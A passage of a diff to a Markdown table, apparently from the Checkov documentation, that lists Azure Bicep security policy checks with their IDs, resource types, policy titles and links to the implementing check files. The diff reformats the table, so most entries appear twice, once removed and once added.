[AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | -| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | -| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | -| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | -| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | -| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 9 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | -| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 15 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 17 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 19 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | -| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | -| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | -| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | -| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 29 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 30 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 31 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 32 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | -| 33 | CKV_AZURE_24 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | -| 34 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 35 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 36 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 37 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 38 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 39 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 40 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 41 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 42 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 43 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 44 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 45 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 46 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 47 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 48 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 49 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 50 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 51 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 52 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 53 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 54 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 55 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 56 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 57 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 58 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | -| 59 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | -| 60 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | -| 61 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 62 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | -| 63 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | -| 64 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | -| 65 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | -| 66 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | -| 67 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | -| 68 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | -| 69 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | -| 70 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | -| 71 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | -| 72 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | -| 73 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 74 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 75 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | -| 76 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | -| 77 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | -| 78 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | -| 79 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | -| 80 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | -| 81 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | -| 82 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | -| 83 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | -| 84 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | -| 85 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | -| 86 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | -| 87 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) | -| 88 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | -| 89 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | -| 90 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 91 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 92 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | -| 93 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 94 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 95 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | -| 96 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|-----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | +| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | +| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) | +| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | +| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | +| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | +| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | +| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | +| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 9 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | 